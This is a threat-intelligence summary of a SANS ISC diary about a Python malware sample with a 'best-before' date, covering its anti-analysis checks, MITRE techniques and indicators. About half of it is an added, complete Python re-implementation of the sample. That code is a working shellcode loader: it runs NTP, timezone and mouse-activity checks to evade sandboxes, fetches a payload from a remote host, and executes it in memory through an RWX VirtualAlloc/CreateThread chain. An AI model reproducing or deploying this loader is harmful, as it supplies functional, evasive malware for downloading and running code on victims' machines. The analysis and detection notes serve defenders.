Malicious Python Script with a “Best Before” Date

A Python-based malicious script uses a best-before date to delay execution, performs anti-analysis checks, and downloads and injects a payload in memory, resembling a Cobalt Strike beacon. The article walks through the time and environment checks (date, mouse activity, timezone, NTP) and the in-memory injection chain, noting a VT score and a SHA256 hash for the sample. #CobaltStrike #AntiVM #AntiDebugger #ProcessInjection #InMemoryExecution #NTP #RFC1918 #VirusTotal

Keypoints

  • The sample is a malicious Python script that will execute only before a specified date (Jun 10 in the example).
  • Its core behavior is to fetch a payload from a remote site, inject it in memory, and start a new thread.
  • The payload appears to be a Cobalt Strike beacon or a Cobalt Strike-like stager; the evidence is the fetch-then-inject-in-memory pattern typical of such stagers, not a named payload family.
  • Anti-analysis checks are implemented: an expiration (best-before) date, mouse button activity and mouse movement, a timezone check, and an NTP time query, so that a sandbox which fakes or fast-forwards the system clock cannot pass the date check.
  • Memory-injection steps are explicit: allocate memory with VirtualAlloc, copy payload with RtlMoveMemory, and execute via CreateThread/WaitForSingleObject.
  • The payload fetch URL is built with a random string in the URI, and the diary gives the script sample's SHA256 hash and VirusTotal score.
  • References include the VirusTotal file page and the SANS ISC diary describing the sample; the sample reportedly scores 12/71 on VT.
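The following is an added example, not the diary's script and not the sample's code: a Python re-implementation of the described control flow (trusted-time check via NTP, best-before gate, timezone and mouse-activity checks, random payload URI, then the VirtualAlloc/RtlMoveMemory/CreateThread chain) so the logic can be studied and unit-tested offline. The year of the best-before date, the expected timezone, the constructed NTP reply and the RFC1918 placeholder host are all assumptions of this example; the Win32 calls run only on Windows.

```python
# Added example (not the ISC diary's script): re-implementation of the described checks
# and injection chain. Time/URI logic runs anywhere; the Win32 parts need Windows.
import ctypes
import datetime as dt
import platform
import random
import socket
import string
import struct
import time
import urllib.request

NTP_DELTA = 2208988800  # seconds from the NTP epoch (1900) to the Unix epoch (1970)
# The sample expired on Jun 10; the year is an assumption of this example.
BEST_BEFORE = dt.datetime(2024, 6, 10, tzinfo=dt.timezone.utc)
# Constructed NTP reply (not captured traffic): LI=0 VN=4 Mode=4, transmit
# timestamp (bytes 40-47) = 2024-06-09 00:00:00 UTC, zero fraction.
SAMPLE_NTP_REPLY = b"\x24" + b"\x00" * 39 + struct.pack("!II", 1717891200 + NTP_DELTA, 0)


def build_ntp_request() -> bytes:
    """48-byte NTP client request: LI=0, VN=3, Mode=3 (0x1b), rest zero."""
    return b"\x1b" + b"\x00" * 47


def parse_ntp_transmit_time(reply: bytes) -> float:
    """Convert the reply's Transmit Timestamp (bytes 40-47) to Unix seconds."""
    if len(reply) < 48:
        raise ValueError("truncated NTP reply")
    secs, frac = struct.unpack("!II", reply[40:48])
    return secs - NTP_DELTA + frac / 2**32


def fetch_ntp_time(server: str = "us.pool.ntp.org", timeout: float = 3.0) -> float:
    """Ask a pool server for the time (the sample used us.pool.ntp.org)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_ntp_request(), (server, 123))
        reply, _ = sock.recvfrom(512)
    return parse_ntp_transmit_time(reply)


def not_expired(now_unix: float, best_before: dt.datetime = BEST_BEFORE) -> bool:
    """Best-before gate: run only while the trusted clock is before the cut-off."""
    return dt.datetime.fromtimestamp(now_unix, dt.timezone.utc) < best_before


def clock_tampered(local_unix: float, ntp_unix: float, tolerance_s: float = 300) -> bool:
    """A sandbox that fast-forwards the system clock to defuse time bombs drifts from NTP."""
    return abs(local_unix - ntp_unix) > tolerance_s


def timezone_is(expected_utc_offset_hours: int) -> bool:
    """Timezone check (assumed form, DST ignored): time.timezone is seconds WEST of UTC."""
    return (-time.timezone) // 3600 == expected_utc_offset_hours


def mouse_activity(window_s: float = 5.0) -> bool:
    """Windows only: GetAsyncKeyState for left/right clicks, GetCursorPos for movement."""
    if platform.system() != "Windows":
        raise OSError("GetAsyncKeyState/GetCursorPos are Win32 APIs")
    user32 = ctypes.windll.user32

    class POINT(ctypes.Structure):
        _fields_ = [("x", ctypes.c_long), ("y", ctypes.c_long)]

    start, now = POINT(), POINT()
    user32.GetCursorPos(ctypes.byref(start))
    deadline = time.monotonic() + window_s
    while time.monotonic() < deadline:
        if any(user32.GetAsyncKeyState(vk) & 0x8000 for vk in (0x01, 0x02)):  # VK_LBUTTON, VK_RBUTTON
            return True
        user32.GetCursorPos(ctypes.byref(now))
        if (now.x, now.y) != (start.x, start.y):
            return True
        time.sleep(0.05)
    return False


def random_uri(base: str, length: int = 8) -> str:
    """Payload URL with a random path segment, as the sample builds it."""
    tail = "".join(random.choices(string.ascii_letters + string.digits, k=length))
    return f"{base.rstrip('/')}/{tail}"


def fetch_payload(url: str, timeout: float = 10.0) -> bytes:
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read()


def inject_and_run(payload: bytes) -> int:
    """Windows only: VirtualAlloc(RWX) -> RtlMoveMemory -> CreateThread -> WaitForSingleObject."""
    if platform.system() != "Windows":
        raise OSError("Win32 injection chain")
    k32 = ctypes.windll.kernel32
    k32.VirtualAlloc.restype = ctypes.c_void_p
    k32.VirtualAlloc.argtypes = [ctypes.c_void_p, ctypes.c_size_t, ctypes.c_uint32, ctypes.c_uint32]
    k32.RtlMoveMemory.argtypes = [ctypes.c_void_p, ctypes.c_void_p, ctypes.c_size_t]
    k32.CreateThread.restype = ctypes.c_void_p
    k32.CreateThread.argtypes = [ctypes.c_void_p, ctypes.c_size_t, ctypes.c_void_p,
                                 ctypes.c_void_p, ctypes.c_uint32, ctypes.c_void_p]
    k32.WaitForSingleObject.argtypes = [ctypes.c_void_p, ctypes.c_uint32]
    buf = k32.VirtualAlloc(None, len(payload), 0x3000, 0x40)  # MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE
    if not buf:
        raise ctypes.WinError()
    k32.RtlMoveMemory(buf, payload, len(payload))
    thread = k32.CreateThread(None, 0, buf, None, 0, None)
    if not thread:
        raise ctypes.WinError()
    return k32.WaitForSingleObject(thread, 0xFFFFFFFF)  # INFINITE


def main(payload_base: str = "http://10.0.0.1", expected_tz: int = -5) -> None:
    """Placeholder RFC1918 host and timezone are assumptions; order mirrors the diary."""
    ntp_now = fetch_ntp_time()
    if clock_tampered(time.time(), ntp_now) or not not_expired(ntp_now):
        return
    if not timezone_is(expected_tz) or not mouse_activity():
        return
    inject_and_run(fetch_payload(random_uri(payload_base)))


if __name__ == "__main__":
    main()
```

From the defender's side the observables this chain leaves are the ones worth hunting: a `python.exe` process sending UDP/123 to a public NTP pool, then an HTTP GET to a random path, then an RWX `VirtualAlloc` followed by `CreateThread` on a non-image address from the same process. The NTP query also means the date check cannot be defeated by simply rolling the sandbox clock back; the analyst has to intercept the NTP reply instead.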

MITRE Techniques

  • [T1105] Ingress Tool Transfer – The malware fetches a payload from a remote site and then injects it in memory. “If all these conditions are met, the payload is fetched and injected in memory.”
  • [T1055] Process Injection – The payload is copied into memory and executed within the process. “Allocate some memory with VirtualAlloc() and 0x40 (PAGE_EXECUTE_READWRITE) … Copy the payload in the newly allocated memory with RtlMoveMemory() … Launch it with CreateThread() and WaitForSingleObject().”
  • [T1497] Virtualization/Sandbox Evasion – Anti-VM and anti-debugging checks are implemented to evade analysis. “The most interesting part is related to the anti-VM and anti-debugging techniques.”
  • [T1497.002] Virtualization/Sandbox Evasion: User Activity Based Checks – GetAsyncKeyState is polled to see whether a human is clicking the mouse; the script reads button state only to gate execution and captures no input, so this is an evasion check rather than T1056 Input Capture. “GetAsyncKeyState() is used to detect if, respectively, the left and right mouse button is used[1].”

Indicators of Compromise

  • [File hash] eca1cd9ce317ada991e0a037e70c15e471e9076faa58adf682efbfe22ffa747f – SHA256 of the Python script sample (the file that scores 12/71 on VT); the fetched payload itself is not hashed in the diary.
  • [URL] https://www.virustotal.com/gui/file/eca1cd9ce317ada991e0a037e70c15e471e9076faa58adf682efbfe22ffa747f – VirusTotal page showing the sample’s VT score.
  • [Domain] us.pool.ntp.org – public NTP pool queried for a trusted time so that a sandbox which fakes or fast-forwards the system clock cannot pass the best-before check. It is a legitimate, widely used service and is not actionable on its own; the signal is a Python process making the query.
  • [IP range] RFC1918 private address (payload host) – the payload is fetched from a private, non-routable address, so the URL is only meaningful inside the environment the script was built for; no public C2 address is given in the diary.

Read more: https://isc.sans.edu/diary/rss/30988